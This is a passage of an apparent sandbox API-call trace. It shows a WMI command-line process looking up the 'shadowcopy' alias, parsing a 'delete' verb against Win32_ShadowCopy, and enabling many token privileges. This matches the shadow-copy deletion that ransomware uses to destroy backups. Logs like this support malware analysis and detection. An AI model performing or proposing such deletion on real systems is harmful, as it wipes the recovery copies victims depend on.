??1CHString@@QAE@XZ () returned 0x75330504 [0098.868] GetCurrentThreadId () returned 0xdb4 [0098.868] ??0CHString@@QAE@XZ () returned 0x14f9b8 [0098.868] malloc (_Size=0xc) returned 0x21d20f0 [0098.868] malloc (_Size=0xc) returned 0x21d2078 [0098.868] malloc (_Size=0xc) returned 0x21d20a8 [0098.868] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0098.869] malloc (_Size=0x3a) returned 0x27feb0 [0098.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa91f7c, cbMultiByte=-1, lpWideCharStr=0x27feb0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0098.869] free (_Block=0x27feb0) [0098.869] malloc (_Size=0xc) returned 0x21d20c0 [0098.869] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0098.869] SysStringLen (param_1="shadowcopy") returned 0xa [0098.869] malloc (_Size=0xc) returned 0x21d20d8 [0098.869] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0098.869] SysStringLen (param_1="'") returned 0x1 [0098.870] free (_Block=0x21d20c0) [0098.870] free (_Block=0x21d20a8) [0098.870] free (_Block=0x21d2078) [0098.870] free (_Block=0x21d20f0) [0098.870] IWbemServices:GetObject (in: This=0xa5d00c, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x14f9b4*=0x0, ppCallResult=0x0 | out: ppObject=0x14f9b4*=0xa69a18, ppCallResult=0x0) returned 0x0 [0098.885] malloc (_Size=0xc) returned 0x21d20f0 [0098.885] IWbemClassObject:Get (in: This=0xa69a18, wszName="Target", lFlags=0, pVal=0x14f974*(varType=0x0, wReserved1=0x14, wReserved2=0xe58c, wReserved3=0xac, varVal1=0xffffffff, varVal2=0xa9a03c), pType=0x0, plFlavor=0x0 | out: pVal=0x14f974*(varType=0x8, wReserved1=0x14, wReserved2=0xe58c, wReserved3=0xac, varVal1="Select * from Win32_ShadowCopy", varVal2=0xa9a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0098.886] free (_Block=0x21d20f0) [0098.886] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0098.886] malloc (_Size=0x3e) returned 0x27feb0 [0098.886] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0098.886] malloc (_Size=0xc) returned 0x21d20f0 [0098.886] IWbemClassObject:Get (in: This=0xa69a18, wszName="PWhere", lFlags=0, pVal=0x14f974*(varType=0x0, wReserved1=0x14, wReserved2=0xe58c, wReserved3=0xac, varVal1=0x4d4fec, varVal2=0xa9a03c), pType=0x0, plFlavor=0x0 | out: pVal=0x14f974*(varType=0x8, wReserved1=0x14, wReserved2=0xe58c, wReserved3=0xac, varVal1=" Where ID = '#'", varVal2=0xa9a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0098.886] free (_Block=0x21d20f0) [0098.886] lstrlenW (lpString=" Where ID = '#'") returned 15 [0098.886] malloc (_Size=0x20) returned 0x27fef8 [0098.886] lstrlenW (lpString=" Where ID = '#'") returned 15 [0098.887] malloc (_Size=0xc) returned 0x21d20f0 [0098.887] IWbemClassObject:Get (in: This=0xa69a18, wszName="Connection", lFlags=0, pVal=0x14f974*(varType=0x0, wReserved1=0x14, wReserved2=0xe58c, wReserved3=0xac, varVal1=0x50483c, varVal2=0xa9a03c), pType=0x0, plFlavor=0x0 | out: pVal=0x14f974*(varType=0xd, wReserved1=0x14, wReserved2=0xe58c, wReserved3=0xac, varVal1=0xa69dd8, varVal2=0xa9a03c), pType=0x0, plFlavor=0x0) returned 0x0 [0098.887] free (_Block=0x21d20f0) [0098.888] IUnknown:QueryInterface (in: This=0xa69dd8, riid=0xa96b50*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x14f9ac | out: ppvObject=0x14f9ac*=0xa69dd8) returned 0x0 [0098.888] GetCurrentThreadId () returned 0xdb4 [0098.888] ??0CHString@@QAE@XZ () returned 0x14f928 [0098.888] malloc (_Size=0xc) returned 0x21d20f0 [0098.888] IWbemClassObject:Get (in: This=0xa69dd8, wszName="Namespace", lFlags=0, pVal=0x14f8f8*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x21d, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x14f8f8*(varType=0x8, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x21d, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.888] free (_Block=0x21d20f0) [0098.888] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0098.888] malloc (_Size=0x16) returned 0x27ebc8 [0098.888] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0098.888] malloc (_Size=0xc) returned 0x21d20f0 [0098.888] IWbemClassObject:Get (in: This=0xa69dd8, wszName="Locale", lFlags=0, pVal=0x14f8f8*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x21d, varVal1=0x516024, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x14f8f8*(varType=0x8, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x21d, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.889] free (_Block=0x21d20f0) [0098.889] lstrlenW (lpString="ms_409") returned 6 [0098.889] malloc (_Size=0xe) returned 0x21d20f0 [0098.889] lstrlenW (lpString="ms_409") returned 6 [0098.889] malloc (_Size=0xc) returned 0x21d2078 [0098.889] IWbemClassObject:Get (in: This=0xa69dd8, wszName="User", lFlags=0, pVal=0x14f8f8*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x21d, varVal1=0x516024, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x14f8f8*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x21d, varVal1=0x516024, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.889] free (_Block=0x21d2078) [0098.889] malloc (_Size=0xc) returned 0x21d2078 [0098.889] IWbemClassObject:Get (in: This=0xa69dd8, wszName="Password", lFlags=0, pVal=0x14f8f8*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x21d, varVal1=0x516024, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x14f8f8*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x21d, varVal1=0x516024, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.889] free (_Block=0x21d2078) [0098.890] malloc (_Size=0xc) returned 0x21d2078 [0098.890] IWbemClassObject:Get (in: This=0xa69dd8, wszName="Server", lFlags=0, pVal=0x14f8f8*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x21d, varVal1=0x516024, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x14f8f8*(varType=0x8, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x21d, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.890] free (_Block=0x21d2078) [0098.890] lstrlenW (lpString=".") returned 1 [0098.890] malloc (_Size=0x4) returned 0x27ff20 [0098.890] lstrlenW (lpString=".") returned 1 [0098.890] malloc (_Size=0xc) returned 0x21d2078 [0098.890] IWbemClassObject:Get (in: This=0xa69dd8, wszName="Authority", lFlags=0, pVal=0x14f8f8*(varType=0x0, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x21d, varVal1=0x516024, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x14f8f8*(varType=0x1, wReserved1=0x0, wReserved2=0x20f0, wReserved3=0x21d, varVal1=0x516024, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.890] free (_Block=0x21d2078) [0098.890] ??1CHString@@QAE@XZ () returned 0x75330504 [0098.890] IUnknown:Release (This=0xa69dd8) returned 0x1 [0098.891] GetCurrentThreadId () returned 0xdb4 [0098.891] ??0CHString@@QAE@XZ () returned 0x14f920 [0098.891] malloc (_Size=0xc) returned 0x21d2078 [0098.891] IWbemClassObject:Get (in: This=0xa69a18, wszName="__RELPATH", lFlags=0, pVal=0x14f900*(varType=0x0, wReserved1=0x7505, wReserved2=0x0, wReserved3=0xa5, varVal1=0x0, varVal2=0xa69dd8), pType=0x0, plFlavor=0x0 | out: pVal=0x14f900*(varType=0x8, wReserved1=0x7505, wReserved2=0x0, wReserved3=0xa5, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xa69dd8), pType=0x0, plFlavor=0x0) returned 0x0 [0098.891] free (_Block=0x21d2078) [0098.891] malloc (_Size=0xc) returned 0x21d2078 [0098.892] GetCurrentThreadId () returned 0xdb4 [0098.892] ??0CHString@@QAE@XZ () returned 0x14f8b0 [0098.892] ??0CHString@@QAE@PBG@Z () returned 0x14f89c [0098.892] ??0CHString@@QAE@ABV0@@Z () returned 0x14f83c [0098.892] ?Empty@CHString@@QAEXXZ () returned 0x75330510 [0098.892] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x27ff30 [0098.892] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0098.892] ?Left@CHString@@QBE?AV1@H@Z () returned 0x14f81c [0098.892] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x14f820 [0098.892] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x14f89c [0098.892] ??1CHString@@QAE@XZ () returned 0x1 [0098.893] ??1CHString@@QAE@XZ () returned 0x1 [0098.893] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x14f818 [0098.893] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x14f83c [0098.893] ??1CHString@@QAE@XZ () returned 0x1 [0098.893] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x27ff98 [0098.893] ?Find@CHString@@QBEHPBG@Z () returned 0xa [0098.893] ?Left@CHString@@QBE?AV1@H@Z () returned 0x14f81c [0098.893] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x14f820 [0098.893] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x14f89c [0098.893] ??1CHString@@QAE@XZ () returned 0x1 [0098.893] ??1CHString@@QAE@XZ () returned 0x1 [0098.893] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x14f818 [0098.893] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x14f83c [0098.893] ??1CHString@@QAE@XZ () returned 0x75330504 [0098.893] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x75330504 [0098.894] ??1CHString@@QAE@XZ () returned 0x75330504 [0098.894] malloc (_Size=0xc) returned 0x21d20a8 [0098.894] malloc (_Size=0xc) returned 0x21d20c0 [0098.894] malloc (_Size=0xc) returned 0x21d2108 [0098.894] malloc (_Size=0xc) returned 0x21d2120 [0098.894] malloc (_Size=0xc) returned 0x21d2138 [0098.894] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0098.894] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0098.895] malloc (_Size=0xc) returned 0x21d2150 [0098.895] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0098.895] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0098.895] malloc (_Size=0xc) returned 0x21d2168 [0098.895] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0098.895] SysStringLen (param_1="\"") returned 0x1 [0098.895] free (_Block=0x21d2150) [0098.895] free (_Block=0x21d2138) [0098.896] free (_Block=0x21d2120) [0098.896] free (_Block=0x21d2108) [0098.896] free (_Block=0x21d20c0) [0098.896] free (_Block=0x21d20a8) [0098.896] IWbemServices:GetObject (in: This=0xa5d064, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x14f8b8*=0x0, ppCallResult=0x0 | out: ppObject=0x14f8b8*=0xa69e68, ppCallResult=0x0) returned 0x0 [0098.899] malloc (_Size=0xc) returned 0x21d20a8 [0098.899] IWbemClassObject:Get (in: This=0xa69e68, wszName="Text", lFlags=0, pVal=0x14f864*(varType=0x0, wReserved1=0x4d, wReserved2=0x3954, wReserved3=0x4d, varVal1=0x4e, varVal2=0xadc1e0), pType=0x0, plFlavor=0x0 | out: pVal=0x14f864*(varType=0x2008, wReserved1=0x4d, wReserved2=0x3954, wReserved3=0x4d, varVal1=0x4f84b8*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x506ff0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xadc1e0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.900] free (_Block=0x21d20a8) [0098.900] SafeArrayGetLBound (in: psa=0x4f84b8, nDim=0x1, plLbound=0x14f87c | out: plLbound=0x14f87c) returned 0x0 [0098.900] SafeArrayGetUBound (in: psa=0x4f84b8, nDim=0x1, plUbound=0x14f878 | out: plUbound=0x14f878) returned 0x0 [0098.900] SafeArrayGetElement (in: psa=0x4f84b8, rgIndices=0x14f8dc, pv=0x14f8a4 | out: pv=0x14f8a4) returned 0x0 [0098.900] malloc (_Size=0xc) returned 0x21d20a8 [0098.900] malloc (_Size=0xc) returned 0x21d20c0 [0098.900] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0098.900] free (_Block=0x21d20a8) [0098.901] IUnknown:Release (This=0xa69e68) returned 0x0 [0098.901] free (_Block=0x21d2168) [0098.901] ??1CHString@@QAE@XZ () returned 0x1 [0098.901] ??1CHString@@QAE@XZ () returned 0x75330504 [0098.901] free (_Block=0x21d2078) [0098.901] ??1CHString@@QAE@XZ () returned 0x75330504 [0098.901] lstrlenW (lpString="Shadow copy management.") returned 23 [0098.901] malloc (_Size=0x30) returned 0x27ff30 [0098.901] lstrlenW (lpString="Shadow copy management.") returned 23 [0098.901] free (_Block=0x21d20c0) [0098.901] IUnknown:Release (This=0xa69a18) returned 0x0 [0098.902] free (_Block=0x21d20d8) [0098.902] ??1CHString@@QAE@XZ () returned 0x75330504 [0098.902] lstrlenW (lpString="PATH") returned 4 [0098.902] lstrlenW (lpString="delete") returned 6 [0098.902] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0098.902] lstrlenW (lpString="WHERE") returned 5 [0098.902] lstrlenW (lpString="delete") returned 6 [0098.902] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0098.902] lstrlenW (lpString="(") returned 1 [0098.902] lstrlenW (lpString="delete") returned 6 [0098.902] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0098.902] lstrlenW (lpString="/") returned 1 [0098.902] lstrlenW (lpString="delete") returned 6 [0098.902] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0098.902] lstrlenW (lpString="-") returned 1 [0098.902] lstrlenW (lpString="delete") returned 6 [0098.903] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0098.903] malloc (_Size=0xc) returned 0x21d20d8 [0098.903] lstrlenW (lpString="GET") returned 3 [0098.903] lstrlenW (lpString="delete") returned 6 [0098.903] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0098.903] lstrlenW (lpString="LIST") returned 4 [0098.903] lstrlenW (lpString="delete") returned 6 [0098.903] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0098.903] lstrlenW (lpString="SET") returned 3 [0098.903] lstrlenW (lpString="delete") returned 6 [0098.903] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0098.903] lstrlenW (lpString="CREATE") returned 6 [0098.903] lstrlenW (lpString="delete") returned 6 [0098.904] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0098.904] lstrlenW (lpString="CALL") returned 4 [0098.904] lstrlenW (lpString="delete") returned 6 [0098.904] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0098.904] lstrlenW (lpString="ASSOC") returned 5 [0098.904] lstrlenW (lpString="delete") returned 6 [0098.904] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0098.904] lstrlenW (lpString="DELETE") returned 6 [0098.904] lstrlenW (lpString="delete") returned 6 [0098.904] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0098.904] free (_Block=0x21d20d8) [0098.904] lstrlenW (lpString="/") returned 1 [0098.904] lstrlenW (lpString="delete") returned 6 [0098.904] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0098.904] lstrlenW (lpString="-") returned 1 [0098.905] lstrlenW (lpString="delete") returned 6 [0098.905] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0098.905] lstrlenW (lpString="delete") returned 6 [0098.905] malloc (_Size=0xe) returned 0x21d20d8 [0098.905] lstrlenW (lpString="delete") returned 6 [0098.905] lstrlenW (lpString="GET") returned 3 [0098.905] lstrlenW (lpString="delete") returned 6 [0098.905] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0098.905] lstrlenW (lpString="LIST") returned 4 [0098.905] lstrlenW (lpString="delete") returned 6 [0098.905] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0098.905] lstrlenW (lpString="SET") returned 3 [0098.905] lstrlenW (lpString="delete") returned 6 [0098.905] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0098.905] lstrlenW (lpString="CREATE") returned 6 [0098.905] lstrlenW (lpString="delete") returned 6 [0098.906] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0098.906] lstrlenW (lpString="CALL") returned 4 [0098.906] lstrlenW (lpString="delete") returned 6 [0098.906] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0098.906] lstrlenW (lpString="ASSOC") returned 5 [0098.906] lstrlenW (lpString="delete") returned 6 [0098.906] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0098.906] lstrlenW (lpString="DELETE") returned 6 [0098.906] lstrlenW (lpString="delete") returned 6 [0098.906] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0098.906] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0098.906] malloc (_Size=0x3e) returned 0x27ff68 [0098.906] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0098.906] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x2708c2d7 | out: _String="Select", _Context=0x2708c2d7) returned="Select" [0098.906] malloc (_Size=0xc) returned 0x21d20c0 [0098.907] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2708c2d7 | out: _String=0x0, _Context=0x2708c2d7) returned="*" [0099.198] lstrlenW (lpString="FROM") returned 4 [0099.198] lstrlenW (lpString="*") returned 1 [0099.198] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0099.198] malloc (_Size=0xc) returned 0x21d2078 [0099.198] free (_Block=0x21d20c0) [0099.198] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2708c2d7 | out: _String=0x0, _Context=0x2708c2d7) returned="from" [0099.198] lstrlenW (lpString="FROM") returned 4 [0099.199] lstrlenW (lpString="from") returned 4 [0099.199] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0099.199] malloc (_Size=0xc) returned 0x21d20c0 [0099.199] free (_Block=0x21d2078) [0099.199] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2708c2d7 | out: _String=0x0, _Context=0x2708c2d7) returned="Win32_ShadowCopy" [0099.199] malloc (_Size=0xc) returned 0x21d2078 [0099.200] free (_Block=0x21d20c0) [0099.200] free (_Block=0x27ff68) [0099.200] free (_Block=0x21d2078) [0099.200] lstrlenW (lpString="SET") returned 3 [0099.200] lstrlenW (lpString="delete") returned 6 [0099.200] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0099.200] lstrlenW (lpString="CREATE") returned 6 [0099.200] lstrlenW (lpString="delete") returned 6 [0099.200] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0099.200] free (_Block=0x273228) [0099.200] malloc (_Size=0x4) returned 0x273228 [0099.200] lstrlenW (lpString="GET") returned 3 [0099.200] lstrlenW (lpString="delete") returned 6 [0099.200] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0099.201] lstrlenW (lpString="LIST") returned 4 [0099.201] lstrlenW (lpString="delete") returned 6 [0099.201] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0099.201] lstrlenW (lpString="ASSOC") returned 5 [0099.201] lstrlenW (lpString="delete") returned 6 [0099.201] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0099.201] WbemLocator:IUnknown:AddRef (This=0xa50828) returned 0x3 [0099.201] free (_Block=0x272860) [0099.201] lstrlenW (lpString="") returned 0 [0099.201] lstrlenW (lpString="XDUWTFONO") returned 9 [0099.201] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0099.201] lstrlenW (lpString="XDUWTFONO") returned 9 [0099.201] malloc (_Size=0x14) returned 0x27ebe8 [0099.202] lstrlenW (lpString="XDUWTFONO") returned 9 [0099.202] GetCurrentThreadId () returned 0xdb4 [0099.202] GetCurrentProcess () returned 0xffffffff [0099.202] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x14fa20 | out: TokenHandle=0x14fa20*=0x278) returned 1 [0099.202] GetTokenInformation (in: TokenHandle=0x278, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14fa1c | out: TokenInformation=0x0, ReturnLength=0x14fa1c) returned 0 [0099.202] malloc (_Size=0x118) returned 0x21d2448 [0099.202] GetTokenInformation (in: TokenHandle=0x278, TokenInformationClass=0x3, TokenInformation=0x21d2448, TokenInformationLength=0x118, ReturnLength=0x14fa1c | out: TokenInformation=0x21d2448, ReturnLength=0x14fa1c) returned 1 [0099.202] AdjustTokenPrivileges (in: TokenHandle=0x278, DisableAllPrivileges=0, NewState=0x21d2448*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0099.202] free (_Block=0x21d2448) [0099.202] CloseHandle (hObject=0x278) returned 1 [0099.203] lstrlenW (lpString="GET") returned 3 [0099.203] lstrlenW (lpString="delete") returned 6 [0099.203] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0099.203] lstrlenW (lpString="LIST") returned 4 [0099.203] lstrlenW (lpString="delete") returned 6 [0099.203] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0099.203] lstrlenW (lpString="SET") returned 3 [0099.203] lstrlenW (lpString="delete") returned 6 [0099.203] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0099.203] lstrlenW (lpString="CALL") returned 4 [0099.203] lstrlenW (lpString="delete") returned 6 [0099.203] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0099.203] lstrlenW (lpString="ASSOC") returned 5 [0099.204] lstrlenW (lpString="delete") returned 6 [0099.204] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0099.204] lstrlenW (lpString="CREATE") returned 6 [0099.204] lstrlenW (lpString="delete") returned 6 [0099.204] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0099.204] lstrlenW (lpString="DELETE") returned 6 [0099.204] lstrlenW (lpString="delete") returned 6 [0099.204] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0099.204] malloc (_Size=0xc) returned 0x21d2078 [0099.205] lstrlenA (lpString="") returned 0 [0099.205] malloc (_Size=0x2) returned 0x272860 [0099.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa926a2, cbMultiByte=-1, lpWideCharStr=0x272860, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0099.205] free (_Block=0x272860) [0099.205] malloc (_Size=0xc) returned 0x21d20c0 [0099.205] lstrlenA (lpString="") returned 0 [0099.205] malloc (_Size=0x2) returned 0x272860 [0099.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa926a2, cbMultiByte=-1, lpWideCharStr=0x272860, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0099.205] free (_Block=0x272860) [0099.205] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0099.205] malloc (_Size=0x3e) returned 0x27ff68 [0099.205] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0099.205] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x2708c17b | out: _String="Select", _Context=0x2708c17b) returned="Select" [0099.206] malloc (_Size=0xc) returned 0x21d2168 [0099.206] free (_Block=0x21d20c0) [0099.206] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2708c17b | out: _String=0x0, _Context=0x2708c17b) returned="*" [0099.206] lstrlenW (lpString="FROM") returned 4 [0099.206] lstrlenW (lpString="*") returned 1 [0099.206] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", 